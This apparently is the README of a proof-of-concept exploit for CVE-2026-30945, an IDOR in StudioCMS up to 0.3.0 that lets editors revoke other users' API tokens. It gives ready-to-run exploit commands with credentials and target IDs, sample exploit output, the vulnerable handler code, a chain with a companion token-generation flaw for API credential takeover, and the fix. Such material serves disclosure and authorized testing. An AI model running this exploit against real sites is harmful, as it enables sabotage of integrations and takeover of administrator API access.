Share
## https://sploitus.com/exploit?id=E950856F-799A-57E7-B819-242D8D96EC96
๐๏ธ CVE-2026-30945
StudioCMS IDOR โ Arbitrary API Token Revocation Leading to Denial of Service
NVD โข
Advisory โข
CWE-639
---
## Overview
The `DELETE /studiocms_api/dashboard/api-tokens` endpoint in **StudioCMS โค 0.3.0** allows any authenticated user with `editor` privileges or above to revoke API tokens belonging to **any other user**, including `admin` and `owner` accounts.
The handler accepts `tokenID` and `userID` directly from the request payload without verifying token ownership, caller identity, or role hierarchy. This enables **targeted denial of service** against critical integrations and automations.
> **Related:** This vulnerability shares the same root cause as [CVE-2026-30944](https://nvd.nist.gov/vuln/detail/CVE-2026-30944) (token generation IDOR). When chained together, an attacker can revoke legitimate tokens and generate new ones, achieving complete API credential takeover.
### Attack Flow
```
โโโโโโโโโโโโโโโโ DELETE /api-tokens โโโโโโโโโโโโโโโโ
โ โ {"tokenID":"", โ โ
โ Attacker โ "userID":""} โ StudioCMS โ
โ (Editor) โ โโโโโโโโโโโโโโโโโโโโโโโโโโโบ โ Server โ
โ โ โ โ
โ โ โโโโโโโโโโโโโโโโโโโโโโโโโโโ โ โ
โโโโโโโโโโโโโโโโ {"message":"Token deleted"} โโโโโโโโโโโโโโโโ
โ
โผ
โโโโโโโโโโโโโโโโ
โ Owner's โ
โ CI/CD โ
โ Pipeline โโโโบ โ 401 Unauthorized
โ Integration โโโโบ โ API Access Lost
โ Monitoring โโโโบ โ Silent Failure
โโโโโโโโโโโโโโโโ
```
### Vulnerability Details
| Field | Value |
|---|---|
| **CVE** | [CVE-2026-30945](https://nvd.nist.gov/vuln/detail/CVE-2026-30945) |
| **GHSA** | [GHSA-8rgj-vrfr-6hqr](https://github.com/withstudiocms/studiocms/security/advisories/GHSA-8rgj-vrfr-6hqr) |
| **CVSS v3.1** | **7.1** (High) โ `AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H` |
| **CWE** | CWE-639: Authorization Bypass Through User-Controlled Key |
| **CWE (secondary)** | CWE-863: Incorrect Authorization |
| **MITRE ATT&CK** | T1531 โ Account Access Removal |
| **OWASP API** | API1:2023 โ Broken Object Level Authorization |
| **Affected** | `studiocms โค 0.3.0` |
| **Fixed in** | `studiocms 0.4.0` |
---
## Contents
| File | Description |
|---|---|
| `cve_2026_30945_poc.py` | Python exploitation script with manual & automated modes |
| `README.md` | This file |
| `LICENSE` | MIT License |
---
## Prerequisites
- **StudioCMS โค 0.3.0** (vulnerable version)
- Python 3.8+
- Valid credentials for at least an `Editor` account
- A known token record UUID (internal ID, not the JWT)
```bash
pip install requests colorama
```
---
## Quick Start
### Manual Exploitation
```bash
# Revoke a specific token belonging to the owner
python3 cve_2026_30945_poc.py \
-u http://localhost:4321 \
--username editor01 \
--password editorpass \
--target-uuid 2450bf33-0135-4142-80be-9854f9a5e9f1 \
--token-id 16a2e549-513b-40ac-8ca3-858af6118afc
# Chain with CVE-2026-30944: create a token for the target first
python3 cve_2026_30945_poc.py \
-u http://localhost:4321 \
--username editor01 \
--password editorpass \
--target-uuid 2450bf33-0135-4142-80be-9854f9a5e9f1
# Save results to JSON
python3 cve_2026_30945_poc.py \
-u http://localhost:4321 \
--username editor01 \
--password editorpass \
--target-uuid 2450bf33-0135-4142-80be-9854f9a5e9f1 \
--token-id 16a2e549-513b-40ac-8ca3-858af6118afc \
--save
```
### Automated Testing
```bash
# Test with multiple roles
python3 cve_2026_30945_poc.py \
-u http://localhost:4321 \
--auto-test \
--editor-user editor01 \
--editor-pass editorpass \
--visitor-user visitor01 \
--visitor-pass visitorpass \
--target-uuid 2450bf33-0135-4142-80be-9854f9a5e9f1 \
--token-id 16a2e549-513b-40ac-8ca3-858af6118afc
```
---
## Arguments
### Required
| Argument | Description |
|---|---|
| `-u, --url` | Target StudioCMS base URL |
| `--target-uuid` | Target user UUID whose token will be revoked |
### Optional
| Argument | Description |
|---|---|
| `--token-id` | Internal token record UUID to revoke (not the JWT). If omitted, the script will attempt to create a token first via CVE-2026-30944 |
### Manual Mode
| Argument | Description |
|---|---|
| `--username` | Username for authentication |
| `--password` | Password for authentication |
### Automated Test Mode
| Argument | Description |
|---|---|
| `--auto-test` | Enable automated multi-role testing |
| `--editor-user` | Editor account username |
| `--editor-pass` | Editor account password |
| `--visitor-user` | Visitor account username |
| `--visitor-pass` | Visitor account password |
### Flags
| Argument | Description |
|---|---|
| `--save` | Save results to JSON file |
| `--no-ssl-verify` | Disable SSL certificate verification |
---
## Example Output
### Vulnerable System
```
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
PHASE 1: Authentication
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
[+] Authenticated as 'editor01'
[*] Session user: editor01 (editor)
[*] Session UUID: 39b3e7d3-5eb0-48e1-abdc-ce95a57b212c
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
PHASE 3: Token Revocation (IDOR)
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
[*] Target UUID: 2450bf33-0135-4142-80be-9854f9a5e9f1
[*] Token ID: 16a2e549-513b-40ac-8ca3-858af6118afc
[*] Revoking target's API token...
[+] Token revoked! Server response: Token deleted
[!] VULNERABILITY CONFIRMED โ Token successfully revoked!
[!] Target user's API integrations are now broken (DoS)
```
### Patched System
```
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
PHASE 3: Token Revocation (IDOR)
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
[*] Target UUID: 2450bf33-0135-4142-80be-9854f9a5e9f1
[*] Token ID: 16a2e549-513b-40ac-8ca3-858af6118afc
[*] Revoking target's API token...
[*] Access denied (403 Forbidden) โ endpoint may be patched
[-] Revocation failed: Access denied (403 Forbidden)
```
---
## Attack Chain (CVE-2026-30944 + CVE-2026-30945)
When combined with the token generation IDOR ([CVE-2026-30944](https://nvd.nist.gov/vuln/detail/CVE-2026-30944)), an attacker can perform a complete API credential takeover:
```
Step 1: Revoke owner's legitimate token (CVE-2026-30945)
โโโโบ Owner's CI/CD pipelines break silently
Step 2: Generate new token for owner (CVE-2026-30944)
โโโโบ Attacker now has owner-level API access
Step 3: Owner creates a new token to fix
โโโโบ Attacker revokes it again (persistent DoS)
```
This creates a scenario where the attacker maintains persistent control over the owner's API access, repeatedly revoking any new tokens the owner creates while maintaining their own illegitimate access.
---
## Root Cause
The vulnerable handler at `packages/studiocms/frontend/pages/studiocms_api/dashboard/api-tokens.ts` (lines 58โ99) accepts `tokenID` and `userID` from the request body and passes them directly to the deletion function without any authorization checks:
```typescript
// [1] Only checks if caller is editor โ not WHO they're deleting tokens for
const isAuthorized = ctx.locals.StudioCMS.security?.userPermissionLevel.isEditor;
// [2] Both values from request body โ no validation against session
const jsonData = yield* readAPIContextJson(ctx);
// [3] Passed directly to destructive operation โ IDOR
yield* sdk.REST_API.tokens.delete({ tokenId: jsonData.tokenID, userId: jsonData.userID });
```
The handler has **five distinct flaws**: insufficient permission gate, no token ownership validation, missing caller identity check, no role hierarchy enforcement, and direct pass-through of user-controlled values to a destructive operation.
---
## Impact
- **Denial of Service** โ API tokens used in CI/CD pipelines, third-party integrations, or monitoring systems can be silently revoked
- **Selective sabotage** โ An editor can surgically revoke tokens from specific admins or owners
- **No audit trail** โ Revocation is processed as a legitimate operation, making attribution difficult
- **Persistent DoS when chained** โ Combined with CVE-2026-30944, attacker can repeatedly revoke any new tokens the victim creates
---
## Mitigation
Update StudioCMS to version **0.4.0** or later:
```bash
npm install studiocms@latest
```
---
## Legal Disclaimer
**This tool is provided for educational and authorized security testing purposes only.**
- Only use against systems you own or have explicit written permission to test
- Unauthorized access to computer systems is illegal in most jurisdictions
- The author assumes no liability for misuse of this tool
- Always follow responsible disclosure practices
---
## References
- **CVE:** [CVE-2026-30945](https://nvd.nist.gov/vuln/detail/CVE-2026-30945)
- **Advisory:** [GHSA-8rgj-vrfr-6hqr](https://github.com/withstudiocms/studiocms/security/advisories/GHSA-8rgj-vrfr-6hqr)
- **Related CVE:** [CVE-2026-30944](https://nvd.nist.gov/vuln/detail/CVE-2026-30944) (Token generation IDOR)
- **CWE:** [CWE-639 โ Authorization Bypass Through User-Controlled Key](https://cwe.mitre.org/data/definitions/639.html)
- **OWASP:** [API1:2023 โ Broken Object Level Authorization](https://owasp.org/API-Security/editions/2023/en/0xa1-broken-object-level-authorization/)
- **MITRE ATT&CK:** [T1531 โ Account Access Removal](https://attack.mitre.org/techniques/T1531/)
---
## Author
**Filipe Gaudard**
---
## License
This PoC is released under the [MIT License](LICENSE) for educational purposes. Use responsibly and ethically.